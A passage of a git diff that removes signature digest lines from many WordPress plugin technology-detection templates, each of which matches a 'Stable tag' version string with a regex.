'(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202a4fbb1239ec460f6bf29ea13d935cd8d8e072875ebd56e1fb79fd1dc1206f1102210082a3395a34cc51ca14b5eeb35a4b3a2cd83bc512769bfaab764e926c967ff31c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index c2adb291d0..88a70b2478 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205433bc96607a9a8d5007f7434932fc90dac0337e7a3e7b25f55c9f0238cc827c0220123a3305577cdc9eee6b2df3b1eaa88a7b1b266cc5f916ac5968a24ba3b92f5c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index c064cec8af..fc498e67e6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203ff857d0a0e74a2c95c6ae7408be51c5f0e9b422103eae325790846f672cacde022100f91171f7446fcb7c0dc5ee2f68b184121652200ef5e0bad4d8da843b59b9b6dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 7e75aa09de..465aa93d57 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bd98dc06860039bb59f35ee67a72ef96e3976fac07f6888fb0b406bbf3fbca2c022100cee59e0cded4f7bd27e1d3bd82f1f8cfa9f64be684a6fd3c87ed3608707461d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 73a0083c41..2a1b0e57a9 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e9e7fa77e18e96eb7021a6eb93173a21b25ca3a1bf9c6aa78ba7c040bb10050b022100d2af3024c4062a66c4ad15996e742aaf842be8159d5051c15fee790836b86102:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 4f752ae4e7..df35e8b415 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c1f07cfb9dd54771db79f50ec5230b1d20ec7cdbd05f8593fc56a79b5cd7497b02204483b09c1bbedb0262a35ffc02846365059c018c17227deb09bcba65edec4a28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 64bf67af82..033cc4bc3d 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f3506dadf9e82da105b54df71f7dd213aaf1bb9202f2e12a4429b5b0d8a4f37f02202da812cb4dbbb4f1dec98d008c59269b6fa9b8df35ff62cfbcf32e5b62a42dd6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluent-smtp.yaml b/http/technologies/wordpress/plugins/fluent-smtp.yaml index cfba9cdbdd..4a3dcbd210 100644 --- a/http/technologies/wordpress/plugins/fluent-smtp.yaml +++ b/http/technologies/wordpress/plugins/fluent-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a884027907b37e5a8994d67a7b6e62a9d853da27b33580a476f6230bb3196f65022100da3632631b4f51f4e7bdc4a011b840e4093942024c298f4faffdcbab5760de55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 8eb2cdce51..945ab6ad03 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009cbdada64eceef62ef38e6d09efbfc49d4a34e135d59d381781247f8790c98b4022100e8d177b07ca753cb30e56f71a83df1230dd98a9a570d7a58e0fa71c536e80738:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index dccb2c75e9..2072b51ab9 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a946cb35f227b0aec9b906da6422b7624cceb7b6ad54ae8262464bfed6be0d2002210085ac96b4d657f960cf06944c0aaf863e8e25efc9f58dfe89b26640d870841a2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index ea6bc17422..b509d8cc67 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204b8e7e834e60795560e3cb90e822d07707a969c392cf061d4f570d7760964bb9022044c1eab9ea8bc665359dc0af75e70bbd86901d1fc2f507ef30cf2ab89abd3c76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index b56da5c75d..c984479bde 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ed416714e86069d8ae0ef1fe189d53e077c8bf94bf512fc7f7677e7eb5b28b7e0221008caafcb150ef1f903ad79e0cb92c9d12a9bbcbaceb96066ade51913db78644b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 3bc6c2fffa..a3870175c7 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a309202b2fad75e205b0ec7ca3836303653e11fb3e14f522277d6bdfe28e0ee1022100859e52a8a16e59558025d1c1c8b28c1640e46041dd0a85cc95c21548d20b3235:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index 1f5f1de8a5..f5f3818ea2 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c0f31b58849b19e4a2637869402ae33609bb150efd381f1529c2f201827a0a13022100a71013fc8c270e2e55837d30cc0d7493b5dc25084b7c67dde5c88ec349580da6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 0df2904fa6..7e5b54c12c 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c7a3bbf417736967a8eba7e6f2da5413b5d4a79fb0609f312e0714c6531069e5022100f3058482038e50e57413c0664fe858e2dfc8358fe70c024d55d766abfa7f775b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 27351a1ea1..59effd09f6 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202ac9a2c5c2d850ce8f29973df9c714c86465c0c0849137715c0482739bbabe330220454db5f6b643eb322a1f7e03f67b8d17b95154815165490cc463107ced89e694:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 3205cb465c..833207dcff 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210083139d8103ea4fe77ff0d8c40403eea6d9b3bccb8e2c49962dd8676a4621d5c902201cac14d242c686c2eb13aff9f0d39dacd8012006b8a0c2f3f724b3336d885de0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index c9af4aab76..b7ea2d38d1 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022017ec9f2ecf58809152a4b3410a70ee5d48711f4ea7e838f269a60f3f1889123e022100d2a6137fc3de61189744e6b4c6eb3ea4571ec411bc3b2f940b0ceb3a86bb1a36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 44f03891ce..2131dbe751 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220599a3a1719d83564d8461afe00b644fc22190255293a1a838c06d6bd95ae2152022100b3ae58f51fd0b97a5abcedb292dc433b144973530e8ae370213adb5974115737:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 16b4d700a6..73d644c5e4 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100daffb475fde845c9bf887372fa0285982ac993d063152b129eac51d8529e8848022100bc773b3088a024517db31febfa7244c8475e7430f7bd8c5bd2bbacbd1ab72790:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 61caa3ee98..7b0593dcb7 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210099ee2d14db80ec9e368bc7cafc8020c05167dfeffbd13db23d38681bedc01549022100b171e0c197f1fe5ca062a8598cf42b37e24599b7810388ead919a957cc82716b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index b5506021e0..6f65d087e4 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cdad706f5cc384fc7dd30fdd4eae40882d83fff2c98f7c81803581f7b6f609ce02207bca9c6c076171e3a69770352821ab0bbc298b13b72dfee88407aa0f31642b23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index b2e01038a5..783cdd283d 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202c307e8a83542f2cf933b411c9ced332eef7b15830a25d576b599f36c63bb74a022019114a04511fda5bcc0d964eb850224baea0dc882ba0031813e8bb7faf7a8b38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index f9cd9e74f0..05121854b3 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220156d4abf897da578113846059caad7fdd4b22d10cc60043ff8b34744138f13d8022019f819201a58cc151e6ce3c644462597d8376ac5c496a2d2f6cb0458a4928c4c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index ded448fc8a..72f52edcd4 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220191cd3b1b87438d434ac76f460a5c6a0bc3c0d44af219ca5d0dce6e695a37568022100ddba82c1dd71e328c7d0a980817270ff555e3c74d03bc8fbcc0fbdc4c0f7bfe5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 599b0ea93e..4cf45ebd74 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a9fda39b66a5d42bf70dd05128977d482df64361a6f773643c7dedef1eb3b067022100d8856588676e8cbd9569036aeaf6fd8d284d16ad3068b24ff0424e8c419a8866:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index cc484eaa76..3d6863e074 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022004451d19ba231ce5a3c9a151ae92890ab7e25347882c13584157f2b94928bf20022100a346144c3626ee241f254a27b3b5def85b2268619de2b3693e49aba8ebb00489:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 08222d378d..79e2813c5e 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202129ddc12b7d4422f64ddd72d8d485a00dccb0e00c1814fda322cade53108c2d022019aa046f425078e33804bf3da6bbb57e5fda726913b0db00ea52f5b3d61fee35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index 4d5c09bcf2..ab9a0f1ae3 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bf0251b47f96ae9167f614733b78f95c9eb213dc8c6411117acbe3052a94946802202f78521d43799eb8e69fe7d04f0f3b6427d45a651a2feeba0f53c6071a3490ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 9972b39966..5d3adf7c27 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b84f2a221277932e173e5d2cb7772e08491aa97ec015f8379d1ad05abbd7e5fd022001f2fcfdab3dbcbfc773c7950f41388fbd94c8c679a47043ec21d84230f211df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index 8bb8d2507a..eda1d27f04 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100992873f118c431bf0b37b83c916c3678944318c75c0668433aa976ef2f8c913002204b3c51339f613b75a6f73cf68f8609167c54d90b7d74aeb90b608de59f4d5250:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index e1073cd859..16dfc8df5f 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207ff543ac94c22aeb1f869f2249b9ac7627f63251a36e53964c7cfdd88c3b888e022100a84d443ae2721cdc8e9d90d0f56426cc4ae45bf57c29af3e5b1a47975e537215:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 617165e5df..4b7600ea69 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b9f87a617ca07acc59d8af50d6201de92f445b935feb42e98f8bfc4c504fa840022100ae04a38d072dbb03a696fd6ebac157690d1f103bb0c1c8a1149245ab2da737be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index e72728fc10..2ccd4dbce8 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200c81d486837c3b20b625f17ea7ae657bf43f2533c9e315317330ed3834563bbf0220042b96a888139d26b96d33e12bb8689803c1a37c6125a22c70dcd7ae55e102e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 5cd27015f7..02ceb224d1 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202187391e0c586acc2de53482383c73c131db5fb9fcd2860cbd8bf8af122ce780022100ac03fde69e37241a15391f6db32d8fe2de5fe73c9df7580384eac01c19006ad3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index c1e008f9f6..367d587ce2 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022047c4354ed8ab212c9d18f98866a0644a8a928e8c1321d7e07e6e0506fb4b40d702204f19bf26dbb848838e450df6072f18624f01a8a6196ad80548fe61392ac1cd05:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index a529c61e4e..feed730ee0 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207b4ca0b81c93a2defdf33127afd6f01945236ae9870f60ed5b3444f23d1d76f4022100d1423f6d9ef637a47a6f3401ba8c81f99b568c18ff04ac3e04a0f815501f9a51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index f6bc902d1d..9b2841e7ca 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c8cec09ba26db6b9dc6fc40e4d1a9090b8c234bd125efe700917225f8434c2eb0221009e93db15ed2eb9af62be13c49ab156059eca7eb535d15d708c1b4d72a1f9e1d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 17da2f8490..42be14c5df 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f178ea9dae4ecbae54e9c87124c40a1490d9d32b81eb9bf5b00be4ac9809b92f02200b9ec47f3316dde4796784f7cd209596d38edb7fbffda87adca330b791243f39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 26784ab1ad..4e0cd86c3f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201b46a8d4c01003dd24efee90b83e1e07de32c8495e59b745ed2f48d95b85536e02200ac0ee19fcb061988128896ca19bd91dff1808c4283010380d3aaa5df5fde5ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index d4bced4d70..59eadc5e6e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a82bee0cbca727065688eb417aa5267685c8fbf8472da965d7ac9b30e87917e1022100e3665d146feeb1cbbfd8e2a45e01c4799411606e61efe206cb5e1eaa96efd6a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index c49be25871..41f7a0075e 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fef148d5f18f2a13f07e18f4137acac4c0acec55596da216108c18fc7c75a4c502201d657fc799c52a48615c832a0b8aa90a39c702400b8dc004720b4f98074d548a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 9e0b9ff129..7e35a3fb4f 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220592c21718f2c8502732c8b5686222f522239865a6a3613c8e9a6a0014e1abf6f022100d9c015d07c51165514ca44c5342f483f697798c285ce48d3ddc315a06cc5f85b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index cc31b18cf8..18c2a7586e 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022058b5b5e01686f6e4f967666574975d65aab145d61fde5bb95995a03fd2fe2c8e022100bfcac36b36295016d91567abb1bc7e90bf6a59a85772bc786ab6f4f779f37533:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 4a2c880b4b..6bc2aa78f9 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b0d36b7b93b2a34edbc3f13e5ab27d07bc1ccaddc1a166182673f319f3a7aa3f022039aaeaac73f571f483568ac76b83e4ebb912c1c1509712e198538707f1978579:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 07f105f7cd..a43d3352a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a7fcf3f34fc4327ae3fe92b6ffab65b1e14896cbfb5579c8342d7460b160027202205a9764a5a846b2d149b941680d92682e381454e1fea0fe5a11f88836b5f96aa7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 00e04ef37b..e7db9944e4 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022042d766d2ca34efc9455977b968a985247df0461131c5a1a1453db2747e14d66c02202731dbd29107f20847f8b514c8d96b2b2013db6465afbabcaf76644e2dcc10cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 40e5c319ca..268bd7b9df 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ 